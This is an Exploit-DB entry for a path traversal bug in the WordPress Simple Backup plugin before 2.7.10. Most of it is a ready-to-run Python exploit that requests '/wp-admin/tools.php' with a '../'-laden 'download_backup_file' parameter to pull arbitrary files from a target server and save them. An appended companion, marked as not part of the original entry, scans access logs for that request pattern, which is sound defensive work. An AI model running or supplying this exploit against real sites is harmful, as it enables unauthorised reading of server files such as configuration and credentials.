
[webapps] Simple Backup Plugin Python Exploit 2.7.10 - Path Traversal

source link: https://www.exploit-db.com/exploits/51937

EDB-ID: 51937
Platform: PHP
Date: 2024-04-02

# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux

import sys
import requests
from urllib.parse import urljoin
import time

def exploit(target_url, file_name, depth):
    traversal = '../' * depth

    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
    params = {
        'page': 'backup_manager',
        'download_backup_file': f'{traversal}{file_name}'
    }

    response = requests.get(exploit_url, params=params)

    if response.status_code == 200 and response.headers.get('Content-Disposition') \
            and 'attachment; filename' in response.headers['Content-Disposition'] \
            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
        print(response.text)  # Replace with the desired action for the downloaded content

        file_path = f'simplebackup_{file_name}'
        with open(file_path, 'wb') as file:
            file.write(response.content)

        print(f'File saved in: {file_path}')
    else:
        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python exploit.py <target_url> <file_name> <depth>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = sys.argv[2]
    depth = int(sys.argv[3])
    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")
    time.sleep(5)


    exploit(target_url, file_name, depth)
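
A defender-side companion to the script above, added here and not part of the original exploit-db entry: it scans web server access logs for the request shape the script sends (`/wp-admin/tools.php` with a `download_backup_file` value that climbs out of the backup directory). The log lines are constructed samples, the combined log format is an assumption about the server, and the function names are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Mar/2024:10:00:00 +0000] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2024-03-01.tar.gz HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Mar/2024:10:02:11 +0000] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=../../example.txt HTTP/1.1" 200 312',
    '198.51.100.7 - - [06/Mar/2024:10:02:15 +0000] "GET /wp-admin/tools.php?page=backup_manager&download_backup_file=..%2F..%2Fexample.txt HTTP/1.1" 200 312',
    '192.0.2.10 - - [06/Mar/2024:10:05:00 +0000] "GET /wp-admin/tools.php?page=site-health HTTP/1.1" 200 900',
]

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so nested encodings are compared in plain form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal_download(request_target):
    """True if the request asks tools.php for a backup file outside the backup directory."""
    parts = urlsplit(request_target)
    if not parts.path.endswith('/wp-admin/tools.php'):
        return False
    # parse_qs decodes once; fully_decode handles any further encoding layers.
    for raw in parse_qs(parts.query).get('download_backup_file', []):
        name = fully_decode(raw).replace('\\', '/')
        # Flag absolute paths and any '..' path segment; 'my..backup.zip' stays clean.
        if name.startswith('/') or '..' in name.split('/'):
            return True
    return False


def scan(lines):
    """Return the log lines whose request matches the traversal pattern."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match and is_traversal_download(match.group(1)):
            hits.append(line)
    return hits
```

A flagged line with status 200 and a non-zero response size matches the success condition the script itself checks for, so those hits deserve attention first.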
            
